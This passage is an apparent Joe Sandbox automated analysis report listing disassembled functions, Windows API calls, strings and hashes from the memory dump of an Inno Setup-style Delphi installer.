                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$CreateFocus$ActiveClassRegisterShow
                                                                                                                                        • String ID: TWindowDisabler-Window
                                                                                                                                        • API String ID: 3167913817-1824977358
                                                                                                                                        • Opcode ID: d82bdac47665a0423d7aef7e4f95abac113c6b4ba7ee72313a02f6ddbd37ff30
                                                                                                                                        • Instruction ID: c3989f54cd535b42bfd745bd8d6279a550c1ea008e6f4be51b2d228796931bcd
                                                                                                                                        • Opcode Fuzzy Hash: d82bdac47665a0423d7aef7e4f95abac113c6b4ba7ee72313a02f6ddbd37ff30
                                                                                                                                        • Instruction Fuzzy Hash: B021A170740710BAE310EF66AD43F1A76B8EB04B44F91853BF604AB2E1D7B86D0586AD
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 00453210
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453216
                                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 0045322A
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453230
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                        • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                                                                                        • API String ID: 1646373207-2130885113
                                                                                                                                        • Opcode ID: d7661fd9f0913dad122060e2c1ded37189c483bc636f4dff06c0b7ded89dfa78
                                                                                                                                        • Instruction ID: a781b9bdaab79611976bfea65fa4e072d6e85bd62b4b6e26dfe65079d72397a7
                                                                                                                                        • Opcode Fuzzy Hash: d7661fd9f0913dad122060e2c1ded37189c483bc636f4dff06c0b7ded89dfa78
                                                                                                                                        • Instruction Fuzzy Hash: EA01D470240B00FED301AF63AD12F663A58D7557ABF6044BBFC14965C2C77C4A088E6D
                                                                                                                                        APIs
                                                                                                                                        • RegisterClipboardFormatA.USER32(commdlg_help), ref: 00430948
                                                                                                                                        • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 00430957
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00430971
                                                                                                                                        • GlobalAddAtomA.KERNEL32(00000000), ref: 00430992
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
                                                                                                                                        • String ID: WndProcPtr%.8X%.8X$commdlg_FindReplace$commdlg_help
                                                                                                                                        • API String ID: 4130936913-2943970505
                                                                                                                                        • Opcode ID: 8a088dfdc0b2c62b7d21c5c596ec815df7ae76573c78c741c8a86d6eee6cb681
                                                                                                                                        • Instruction ID: 0bd92e6c8c1c5a5b8444157758b44b4e11dae02c37acc47d2edddbd1fb793b69
                                                                                                                                        • Opcode Fuzzy Hash: 8a088dfdc0b2c62b7d21c5c596ec815df7ae76573c78c741c8a86d6eee6cb681
                                                                                                                                        • Instruction Fuzzy Hash: 22F012B0458340DEE300EB65994271E7BD0EF58718F50467FF498A6392D7795904CB5F
                                                                                                                                        APIs
                                                                                                                                        • GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,0045522C,0045522C,?,0045522C,00000000), ref: 004551BA
                                                                                                                                        • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,0045522C,0045522C,?,0045522C), ref: 004551C7
                                                                                                                                          • Part of subcall function 00454F7C: WaitForInputIdle.USER32(?,00000032), ref: 00454FA8
                                                                                                                                          • Part of subcall function 00454F7C: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00454FCA
                                                                                                                                          • Part of subcall function 00454F7C: GetExitCodeProcess.KERNEL32(?,?), ref: 00454FD9
                                                                                                                                          • Part of subcall function 00454F7C: CloseHandle.KERNEL32(?,00455006,00454FFF,?,?,?,00000000,?,?,004551DB,?,?,?,00000044,00000000,00000000), ref: 00454FF9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
                                                                                                                                        • String ID: .bat$.cmd$COMMAND.COM" /C $D$cmd.exe" /C "
                                                                                                                                        • API String ID: 854858120-615399546
                                                                                                                                        • Opcode ID: 5ea26466aa0b1bd12af3311b8e232ebea4e464fdb3bb6eef9ccee3db0f285c88
                                                                                                                                        • Instruction ID: 058baa7e90e176347c833b132b7c272bf8058e823d6e061bdbf2f6311869cd9e
                                                                                                                                        • Opcode Fuzzy Hash: 5ea26466aa0b1bd12af3311b8e232ebea4e464fdb3bb6eef9ccee3db0f285c88
                                                                                                                                        • Instruction Fuzzy Hash: 41516D34B0074DABCF10EFA5D852BDEBBB9AF44305F50447BB804B7292D7789A098B59
                                                                                                                                        APIs
                                                                                                                                        • LoadIconA.USER32(00400000,MAINICON), ref: 0042371C
                                                                                                                                        • GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 00423749
                                                                                                                                        • OemToCharA.USER32(?,?), ref: 0042375C
                                                                                                                                        • CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 0042379C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Char$FileIconLoadLowerModuleName
                                                                                                                                        • String ID: 2$MAINICON
                                                                                                                                        • API String ID: 3935243913-3181700818
                                                                                                                                        • Opcode ID: a0d1a492a3e1df344d79b5ede7937f80cf878dadafa44837ceada302c6d607ca
                                                                                                                                        • Instruction ID: 339a64ebbf2375270c19ef2cfa2d714624ee8dcb7e06b01b5ae6522dc3b50067
                                                                                                                                        • Opcode Fuzzy Hash: a0d1a492a3e1df344d79b5ede7937f80cf878dadafa44837ceada302c6d607ca
                                                                                                                                        • Instruction Fuzzy Hash: 243181B0A042549ADF10EF29D8C57C67BA8AF14308F4441BAE844DB393D7BED988CB59
                                                                                                                                        APIs
                                                                                                                                        • GetCurrentProcessId.KERNEL32(00000000), ref: 00418F3D
                                                                                                                                        • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F5E
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00418F79
                                                                                                                                        • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F9A
                                                                                                                                          • Part of subcall function 004230C8: GetDC.USER32(00000000), ref: 0042311E
                                                                                                                                          • Part of subcall function 004230C8: EnumFontsA.GDI32(00000000,00000000,00423068,00410460,00000000,?,?,00000000,?,00418FD3,00000000,?,?,?,00000001), ref: 00423131
                                                                                                                                          • Part of subcall function 004230C8: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00423139
                                                                                                                                          • Part of subcall function 004230C8: ReleaseDC.USER32(00000000,00000000), ref: 00423144
                                                                                                                                          • Part of subcall function 0042368C: LoadIconA.USER32(00400000,MAINICON), ref: 0042371C
                                                                                                                                          • Part of subcall function 0042368C: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 00423749
                                                                                                                                          • Part of subcall function 0042368C: OemToCharA.USER32(?,?), ref: 0042375C
                                                                                                                                          • Part of subcall function 0042368C: CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 0042379C
                                                                                                                                          • Part of subcall function 0041F118: GetVersion.KERNEL32(?,00418FF0,00000000,?,?,?,00000001), ref: 0041F126
                                                                                                                                          • Part of subcall function 0041F118: SetErrorMode.KERNEL32(00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F142
                                                                                                                                          • Part of subcall function 0041F118: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F14E
                                                                                                                                          • Part of subcall function 0041F118: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F15C
                                                                                                                                          • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F18C
                                                                                                                                          • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1B5
                                                                                                                                          • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1CA
                                                                                                                                          • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1DF
                                                                                                                                          • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F1F4
                                                                                                                                          • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F209
                                                                                                                                          • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F21E
                                                                                                                                          • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F233
                                                                                                                                          • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F248
                                                                                                                                          • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F25D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$AtomCharCurrentErrorGlobalLoadMode$CapsDeviceEnumFileFontsIconLibraryLowerModuleNameProcessReleaseThreadVersion
                                                                                                                                        • String ID: ControlOfs%.8X%.8X$Delphi%.8X
                                                                                                                                        • API String ID: 316262546-2767913252
                                                                                                                                        • Opcode ID: b417f06b73a7dba032b12b865c8ed9bc6bb92a8bfb887f153b822e9fb73695be
                                                                                                                                        • Instruction ID: d883a59e21ed3b4d0722d018b4a025de81f9e45e1fd093e44b5ebaba0e30331f
                                                                                                                                        • Opcode Fuzzy Hash: b417f06b73a7dba032b12b865c8ed9bc6bb92a8bfb887f153b822e9fb73695be
                                                                                                                                        • Instruction Fuzzy Hash: AC115E706142419AD740FF76A94235A7BE1DF64308F40943FF448A7391DB3DA9448B5F
                                                                                                                                        APIs
                                                                                                                                        • SetWindowLongA.USER32(?,000000FC,?), ref: 00413664
                                                                                                                                        • GetWindowLongA.USER32(?,000000F0), ref: 0041366F
                                                                                                                                        • GetWindowLongA.USER32(?,000000F4), ref: 00413681
                                                                                                                                        • SetWindowLongA.USER32(?,000000F4,?), ref: 00413694
                                                                                                                                        • SetPropA.USER32(?,00000000,00000000), ref: 004136AB
                                                                                                                                        • SetPropA.USER32(?,00000000,00000000), ref: 004136C2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LongWindow$Prop
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3887896539-0
                                                                                                                                        • Opcode ID: 7846fecbe383e6d7fdaea4169180c186d89bab15e88d328ea810806c298c4441
                                                                                                                                        • Instruction ID: 06abc153636d574f2b9d5b42ed2ef1d3d1989bf2b09c04f5b7aa0ee96fd2bcf7
                                                                                                                                        • Opcode Fuzzy Hash: 7846fecbe383e6d7fdaea4169180c186d89bab15e88d328ea810806c298c4441
                                                                                                                                        • Instruction Fuzzy Hash: 1011C975100244BFEF00DF9DDC84EDA37E8EB19364F144666B958DB2A2D738DD908B68
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,0045586F,?,00000000,004558AF), ref: 004557B5
                                                                                                                                        Strings
                                                                                                                                        • WININIT.INI, xrefs: 004557E4
                                                                                                                                        • PendingFileRenameOperations2, xrefs: 00455784
                                                                                                                                        • PendingFileRenameOperations, xrefs: 00455754
                                                                                                                                        • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00455738
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseOpen
                                                                                                                                        • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
                                                                                                                                        • API String ID: 47109696-2199428270
                                                                                                                                        • Opcode ID: 430bb035026106b65f85e2b07525b73901b650abba9068f13605831850c1f819
                                                                                                                                        • Instruction ID: 0fa1da25f67206326559771d92c7e47b52ca8d856d575cc5f046ac455f5bab2a
                                                                                                                                        • Opcode Fuzzy Hash: 430bb035026106b65f85e2b07525b73901b650abba9068f13605831850c1f819
                                                                                                                                        • Instruction Fuzzy Hash: FF51A974E006089FDB10EF61DC51AEEB7B9EF44305F50857BEC04A7292DB78AE49CA58
                                                                                                                                        APIs
                                                                                                                                        • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,0047CCEA,?,?,00000000,0049B628,00000000,00000000,?,00498539,00000000,004986E2,?,00000000), ref: 0047CC27
                                                                                                                                        • GetLastError.KERNEL32(00000000,00000000,00000000,0047CCEA,?,?,00000000,0049B628,00000000,00000000,?,00498539,00000000,004986E2,?,00000000), ref: 0047CC30
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateDirectoryErrorLast
                                                                                                                                        • String ID: Created temporary directory: $\_setup64.tmp$_isetup
                                                                                                                                        • API String ID: 1375471231-2952887711
                                                                                                                                        • Opcode ID: 18b8a6295044c03030742dd0e1a53df86680db30ea117cbe65252b99daff8b31
                                                                                                                                        • Instruction ID: e6577b7b61f0e0a35e690824fc442bae28cfcbc8f9cba78cd8161ab2dbd6b5d1
                                                                                                                                        • Opcode Fuzzy Hash: 18b8a6295044c03030742dd0e1a53df86680db30ea117cbe65252b99daff8b31
                                                                                                                                        • Instruction Fuzzy Hash: E6412834A001099BDB11EFA5D882ADEB7B5EF45309F50843BE81577392DA38AE05CF68
                                                                                                                                        APIs
                                                                                                                                        • EnumWindows.USER32(00423A1C), ref: 00423AA8
                                                                                                                                        • GetWindow.USER32(?,00000003), ref: 00423ABD
                                                                                                                                        • GetWindowLongA.USER32(?,000000EC), ref: 00423ACC
                                                                                                                                        • SetWindowPos.USER32(00000000,\AB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241AB,?,?,00423D73), ref: 00423B02
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$EnumLongWindows
                                                                                                                                        • String ID: \AB
                                                                                                                                        • API String ID: 4191631535-3948367934
                                                                                                                                        • Opcode ID: 1f387ac1e946b45dcea70a74dde1e3cf145931a60cd8f654a7309261af8d74ee
                                                                                                                                        • Instruction ID: 3ad81c14f5822e14e615a382c86082b2427cd388a5bf15486a3129e996868218
                                                                                                                                        • Opcode Fuzzy Hash: 1f387ac1e946b45dcea70a74dde1e3cf145931a60cd8f654a7309261af8d74ee
                                                                                                                                        • Instruction Fuzzy Hash: D6115E70700610ABDB109F28E885F5677E8EB08715F10026AF994AB2E3C378ED41CB59
                                                                                                                                        APIs
                                                                                                                                        • RegDeleteKeyA.ADVAPI32(00000000,00000000), ref: 0042DE50
                                                                                                                                        • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DFEB,00000000,0042E003,?,?,?,?,00000006,?,00000000,0049785D), ref: 0042DE6B
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DE71
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressDeleteHandleModuleProc
                                                                                                                                        • String ID: RegDeleteKeyExA$advapi32.dll
                                                                                                                                        • API String ID: 588496660-1846899949
                                                                                                                                        • Opcode ID: ed1542cdc99e60fdc1e6205037aed1b156b4601bf62b1d4fa5b097ff81e7402e
                                                                                                                                        • Instruction ID: e7246de0df94fba710dd2820c0ca51643d5dd29c3ac0bea476bad59fd0e01b91
                                                                                                                                        • Opcode Fuzzy Hash: ed1542cdc99e60fdc1e6205037aed1b156b4601bf62b1d4fa5b097ff81e7402e
                                                                                                                                        • Instruction Fuzzy Hash: 73E06DF1B41B30AAD72022657C8ABA33729DB75365F658437F105AD19183FC2C50CE9D
                                                                                                                                        Strings
                                                                                                                                        • PrepareToInstall failed: %s, xrefs: 0046BE6E
                                                                                                                                        • NextButtonClick, xrefs: 0046BC4C
                                                                                                                                        • Need to restart Windows? %s, xrefs: 0046BE95
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: Need to restart Windows? %s$NextButtonClick$PrepareToInstall failed: %s
                                                                                                                                        • API String ID: 0-2329492092
                                                                                                                                        • Opcode ID: bdd1d04c3163942a70fe70ce9c3da0cdba0d450c43b562cfb8d9ec13df8274e7
                                                                                                                                        • Instruction ID: 9de4db1b3e70fdebeced0fe060001c857bcfdee1b2562a0b259a97201065334e
                                                                                                                                        • Opcode Fuzzy Hash: bdd1d04c3163942a70fe70ce9c3da0cdba0d450c43b562cfb8d9ec13df8274e7
                                                                                                                                        • Instruction Fuzzy Hash: 46D12F34A00108DFCB14EB99D985AED77F5EF49304F5440BAE404EB362D778AE85CB9A
                                                                                                                                        APIs
                                                                                                                                        • SetActiveWindow.USER32(?,?,00000000,004833D5), ref: 004831A8
                                                                                                                                        • SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 00483246
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ActiveChangeNotifyWindow
                                                                                                                                        • String ID: $Need to restart Windows? %s
                                                                                                                                        • API String ID: 1160245247-4200181552
                                                                                                                                        • Opcode ID: 00647651f2966e2d6c0ac7b0a33bca8c0b176202d01056079f53a530b7b0addf
